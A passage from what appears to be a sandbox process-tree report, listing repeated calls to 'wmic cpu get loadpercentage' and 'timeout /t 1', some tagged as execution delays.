    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4996
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3580
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:64
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3596
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2128
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4176
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:96
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5076
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3612
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3560
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:400
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:32
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4152
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1732
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2420
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2760
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1580
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2552
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:704
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3156
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3572
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3116
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2128
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:500
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1244
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4100
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3172
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2552
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
